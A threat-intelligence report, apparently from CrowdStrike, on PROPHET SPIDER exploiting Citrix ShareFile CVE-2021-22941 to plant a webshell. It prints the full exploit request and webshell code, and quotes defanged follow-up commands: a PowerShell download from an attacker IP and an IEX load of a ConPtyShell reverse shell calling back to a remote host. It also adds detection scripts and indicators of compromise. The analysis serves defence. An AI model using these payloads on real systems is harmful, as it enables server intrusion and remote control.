PROPHET SPIDER Exploits Citrix ShareFile Remote Code Execution Vulnerability CVE-2021-22941 to Deliver Webshell

At the start of 2022, CrowdStrike Intelligence and CrowdStrike Services investigated an incident in which PROPHET SPIDER exploited CVE-2021-22941, a remote code execution (RCE) vulnerability in Citrix ShareFile Storage Zones Controller, to compromise a Microsoft Internet Information Services (IIS) web server. The adversary used the vulnerability to plant a webshell, then used the webshell to download additional tools. The incident shows PROPHET SPIDER continuing to evolve its tradecraft while still relying on publicly known web-server vulnerabilities for initial access.

Background

PROPHET SPIDER

PROPHET SPIDER is an eCrime actor, active since at least May 2017, that primarily gains access to victims by compromising vulnerable web servers, which commonly involves leveraging a variety of publicly disclosed vulnerabilities. The adversary has likely functioned as an access broker — handing off access to a third party to deploy ransomware — in multiple instances.

CVE-2021-22941

In September 2021, Citrix disclosed a relative path-traversal vulnerability in ShareFile Storage Zones Controller, designated CVE-2021-22941. Shortly thereafter, security researchers demonstrated a proof-of-concept (POC) exploit for the CVE. Working from the published technical details, others produced fully weaponized exploits for CVE-2021-22941, which have proliferated since mid-October 2021. The vulnerability allows an adversary to overwrite an existing file on the target server by supplying a path-traversal sequence in the uploadid parameter of a request to upload.aspx.

Initial Access and Exploitation

On Jan. 10, 2022, PROPHET SPIDER sent an HTTP POST request to an IIS server of a CrowdStrike Falcon® platform customer, using the user agent python-requests/2.26.0. The request to /upload.aspx carried the following payload:

POST /upload.aspx?uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123

There are three key components to this request.

The URI endpoint /upload.aspx is used for ShareFile uploads and usually comes with parameters to define upload object specifications, such as uploadid, cid or batchid. In this case, the uploadid parameter contained a webshell:

uploadid=@using+System.Diagnostics;@{int+idx0=+0;string+str_idx0+=+idx0.ToString();+int+idx1+=+1;string+str_idx1+=+idx1.ToString();string+cmd+=+Request.QueryString[str_idx0];string+arg+=+Request.QueryString[str_idx1];Process.Start(cmd,arg);}

This is the content the exploit writes into an ASP.NET view file. It uses Razor syntax: @using System.Diagnostics; imports the namespace that defines Process, and @{ ... } opens a C# code block that runs whenever the view is rendered. Inside the block, idx0.ToString() and idx1.ToString() yield the strings "0" and "1", so cmd and arg are read from the query-string parameters named 0 and 1, and Process.Start(cmd, arg) is the backdoor function that executes arbitrary commands with those values.

/../../ConfigService\Views\Shared\Error.cshtml

This is the relative path traversal that will allow the payload to overwrite the legitimate Error.cshtml page.

bp=123&accountid=123

These are parameters expected by the upload handler, included so the request does not fail before the file is written. The values also match the defaults used in the publicly available CVE-2021-22941 exploit mentioned above.

Analysts looking for evidence of attempted CVE-2021-22941 exploitation can examine IIS access logs for web requests that:

  • Target upload.aspx
  • Contain URL-encoded ../ sequences (%2F..%2F) and the target path ConfigService\Views\Shared\Error.cshtml (logged with %5C for each backslash) in the query string
  • May contain &bp=123&accountid=123 if the attacker has not customized the public exploit's default values

Once the webshell is in place, it is driven by sending an HTTP GET request to /configservice/Home/Error with one or two query parameters named 0 and 1 (for example, ?0=cmd.exe&1=/c whoami). ASP.NET renders that route with Error.cshtml, which normally contains a simple HTML header saying “Sorry, an error occurred while processing your request.” Because the exploit replaced the view's contents with the C# code block, rendering it now invokes Process.Start(cmd, arg) with the values of those parameters.
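Both stages above, the overwrite request and the later calls to /configservice/Home/Error, can be picked out of IIS W3C logs mechanically. The following Python is an added example written for this page, not CrowdStrike or Citrix tooling. The log lines in it are constructed (field order, timestamps and client addresses are invented; the exploit query string is the one reproduced above), and it assumes IIS's default behaviour of logging cs-uri-query exactly as received, still URL-encoded.

```python
"""IIS access-log triage for the CVE-2021-22941 pattern described above.

Added example, not CrowdStrike or Citrix code.  SAMPLE_LOG is constructed: the
field order, timestamps and client IPs are invented, and the exploit query
string is the one reproduced in the article.  IIS writes cs-uri-query exactly
as received (still URL-encoded), so the checks decode it first.
"""
import re
from urllib.parse import parse_qs, unquote_plus

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2022-01-10 14:02:11 10.0.0.5 GET /upload.aspx uploadid=abc123&cid=1 203.0.113.9 Mozilla/5.0 200
2022-01-10 14:05:37 10.0.0.5 POST /upload.aspx uploadid=%40using+System.Diagnostics%3B%40%7Bint+idx0%3D+0%3Bstring+str_idx0+%3D+idx0.ToString%28%29%3B+int+idx1+%3D+1%3Bstring+str_idx1+%3D+idx1.ToString%28%29%3Bstring+cmd+%3D+Request.QueryString%5Bstr_idx0%5D%3Bstring+arg+%3D+Request.QueryString%5Bstr_idx1%5D%3BProcess.Start%28cmd%2Carg%29%3B%7D%2F..%2F..%2FConfigService%5CViews%5CShared%5CError.cshtml&bp=123&accountid=123 198.51.100.7 python-requests/2.26.0 200
2022-01-10 14:06:02 10.0.0.5 GET /configservice/Home/Error 0=cmd.exe&1=/c+whoami 198.51.100.7 python-requests/2.26.0 200
2022-01-10 14:07:45 10.0.0.5 GET /configservice/Home/Error - 203.0.113.22 Mozilla/5.0 200
"""

TRAVERSAL = re.compile(r"\.\.[\\/]")
TARGET_VIEW = re.compile(r"ConfigService[\\/]Views[\\/]Shared[\\/]Error\.cshtml", re.IGNORECASE)
RAZOR_MARKERS = ("@{", "Process.Start", "Request.QueryString")
DEFAULT_POC_PARAMS = "bp=123&accountid=123"


def parse_w3c(text):
    """Turn IIS W3C extended log text into dicts keyed by the #Fields names."""
    fields, entries = [], []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line.startswith("#") or not line.strip():
            continue
        else:
            values = line.split(" ")
            if fields and len(values) == len(fields):
                entries.append(dict(zip(fields, values)))
    return entries


def classify(entry):
    """Return a finding dict for an entry that matches either stage, else None."""
    stem = entry.get("cs-uri-stem", "").lower()
    raw_query = entry.get("cs-uri-query", "")
    raw_query = "" if raw_query == "-" else raw_query
    decoded = unquote_plus(raw_query)

    # Stage 1: the overwrite.  Traversal plus the target view inside the query
    # of upload.aspx is the exploit signature; Razor markers and the PoC's
    # default bp/accountid values are supporting evidence only.
    if stem.endswith("/upload.aspx") and TRAVERSAL.search(decoded) and TARGET_VIEW.search(decoded):
        return {
            "stage": "cve-2021-22941-overwrite",
            "client": entry.get("c-ip"),
            "razor_payload": any(m in decoded for m in RAZOR_MARKERS),
            "default_poc_params": DEFAULT_POC_PARAMS in raw_query,
            "user_agent": entry.get("cs(User-Agent)"),
        }

    # Stage 2: the webshell being driven.  The planted code reads
    # Request.QueryString["0"] and ["1"], so look for those parameter names.
    if stem == "/configservice/home/error":
        params = parse_qs(raw_query, keep_blank_values=True)
        if "0" in params:
            return {
                "stage": "webshell-invocation",
                "client": entry.get("c-ip"),
                "cmd": params["0"][0],
                "arg": params.get("1", [""])[0],
            }
    return None


def triage(text):
    """Parse the log and return the findings in order of appearance."""
    return [f for f in (classify(e) for e in parse_w3c(text)) if f]


if __name__ == "__main__":
    for finding in triage(SAMPLE_LOG):
        print(finding)
```

Run as a script it prints the two findings from the sample. The traversal-plus-Error.cshtml test is the load-bearing condition; the Razor markers and the bp=123&accountid=123 defaults only tell you whether the public exploit was used unmodified, so they are recorded as evidence rather than required for the alert.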

Post-exploitation Commands 

After achieving initial access, PROPHET SPIDER used the following command to test connectivity:

CMD.exe /C nslookup xab8v404gwftvw5nvw95ig6ybphf54.burpcollaborator[.]net

If successful, this command resolves a subdomain of burpcollaborator[.]net. Burp Collaborator, the out-of-band testing service built into PortSwigger's Burp Suite web-security testing tool, records DNS lookups for such subdomains, so the adversary can confirm that the command executed and that the host can resolve external names even though the webshell itself returns no output.

The adversary next attempted to execute encoded PowerShell commands that decoded to:

powershell -Command (New-Object System.Net.WebClient).DownloadFile('http[:]//45.61.136[.]39:443/wget[.]bin','C:\Windows\temp\wget.bin')

cmd /c c:\Windows\temp\wget.bin -t 1 http[:]//45.61.136[.]39:443/winn.exe -O c:\windows\temp\wi.exe

These commands attempted to download the legitimate wget utility (saved as wget.bin) from a remote IP address, then use it to fetch a second binary, winn.exe, saving it as wi.exe. The winn.exe download was unsuccessful. The adversary then attempted to load an open-source reverse shell directly from GitHub:

powershell -Command IEX(IWR https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell -RemoteIp 107.181.187[.]184 -RemotePort 4242 -Rows 44 -Cols 166

This payload attempted to load the ConPtyShell reverse shell directly from GitHub, with parameters to connect back to the IP address 107.181.187[.]184 over TCP port 4242.
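The process-level side of the intrusion can be triaged the same way: decode any encoded PowerShell, then score each command line against the behaviours seen above (out-of-band DNS check, WebClient download, wget staged in the temp directory, in-memory script execution, ConPtyShell). This Python is an added example for this page, not CrowdStrike code. It assumes the encoded PowerShell was passed via -EncodedCommand (base64 of UTF-16LE), which the article does not state, and the sample events are constructed from the decoded commands shown above, kept defanged, plus one benign command line to show what is not flagged.

```python
"""Decode and flag the post-exploitation command lines discussed above.

Added example, not CrowdStrike code.  It assumes the encoded PowerShell was
passed with -EncodedCommand (base64 of UTF-16LE), which the article does not
state; SAMPLE_EVENTS is constructed from the decoded commands it prints, kept
defanged, plus one benign command line.
"""
import base64
import re


def encode_powershell(command):
    """Build the -EncodedCommand form; used here only to construct the sample."""
    return base64.b64encode(command.encode("utf-16le")).decode("ascii")


SAMPLE_EVENTS = [
    "CMD.exe /C nslookup xab8v404gwftvw5nvw95ig6ybphf54.burpcollaborator[.]net",
    "powershell -EncodedCommand " + encode_powershell(
        "(New-Object System.Net.WebClient).DownloadFile("
        "'http[:]//45.61.136[.]39:443/wget[.]bin','C:\\Windows\\temp\\wget.bin')"),
    "cmd /c c:\\Windows\\temp\\wget.bin -t 1 http[:]//45.61.136[.]39:443/winn.exe "
    "-O c:\\windows\\temp\\wi.exe",
    "powershell -enc " + encode_powershell(
        "IEX(IWR https[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell/master/"
        "Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell "
        "-RemoteIp 107.181.187[.]184 -RemotePort 4242 -Rows 44 -Cols 166"),
    # Benign, constructed: must not be flagged and must not be mistaken for -e.
    "powershell -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1",
]

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENCODED_FLAG = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# (label, pattern) pairs written against the decoded command text.
INDICATORS = [
    ("oob-dns-check", re.compile(r"nslookup\s+\S*burpcollaborator", re.IGNORECASE)),
    ("webclient-download", re.compile(r"Net\.WebClient\)?\.DownloadFile", re.IGNORECASE)),
    ("wget-in-temp", re.compile(r"\\temp\\wget\.bin", re.IGNORECASE)),
    ("remote-script-exec", re.compile(r"\bIEX\s*\(\s*IWR\b", re.IGNORECASE)),
    ("conptyshell", re.compile(r"Invoke-ConPtyShell", re.IGNORECASE)),
]

# IPv4 with or without [.] defanging; normalised on extraction.
IPV4 = re.compile(r"\b(?:\d{1,3}(?:\[\.\]|\.)){3}\d{1,3}\b")


def decode_powershell(cmdline):
    """Return the decoded script if cmdline carries an encoded command, else cmdline."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def extract_ipv4(text):
    """Collect IPv4 literals from text, undoing [.] defanging."""
    return sorted({ip.replace("[.]", ".") for ip in IPV4.findall(text)})


def triage(events):
    """Return one record per command line that hits at least one indicator."""
    findings = []
    for cmdline in events:
        decoded = decode_powershell(cmdline)
        hits = [label for label, pat in INDICATORS if pat.search(decoded)]
        if hits:
            findings.append({"cmdline": cmdline, "decoded": decoded,
                             "indicators": hits, "ipv4": extract_ipv4(decoded)})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding["indicators"], finding["ipv4"], finding["decoded"][:60])
```

The decoding step matters more than the patterns: without it the DownloadFile and IEX(IWR ...) lines are invisible in the raw command line, and the -ExecutionPolicy case shows why the flag match must be anchored on whitespace rather than on any argument starting with -e.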

Conclusion

As CrowdStrike Intelligence previously reported, PROPHET SPIDER is an opportunistic eCrime actor that exploits publicly disclosed server vulnerabilities, often to deliver webshells. This recent CVE-2021-22941 exploitation demonstrates the adversary’s willingness to operationalize new and different exploit code, as well as their enduring preference for deploying the wget utility to begin operations.

Indicators of Compromise (IOCs)

Description                                          Indicator
Site hosting wget.bin and winn.exe                   45.61.136[.]39
Callback destination for ConPtyShell reverse shell   107.181.187[.]184
Source observed exploiting CVE-2021-22941            188.119.149[.]160
Site hosting ConPtyShell reverse shell               hxxps[:]//raw.githubusercontent[.]com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1

MITRE ATT&CK® Observed Tactics

Tactic                Technique
Initial Access        T1190: Exploit Public-Facing Application
Execution             T1059.001: Command and Scripting Interpreter: PowerShell
Persistence           T1505.003: Server Software Component: Web Shell
Command and Control   T1071: Application Layer Protocol
                      T1105: Ingress Tool Transfer
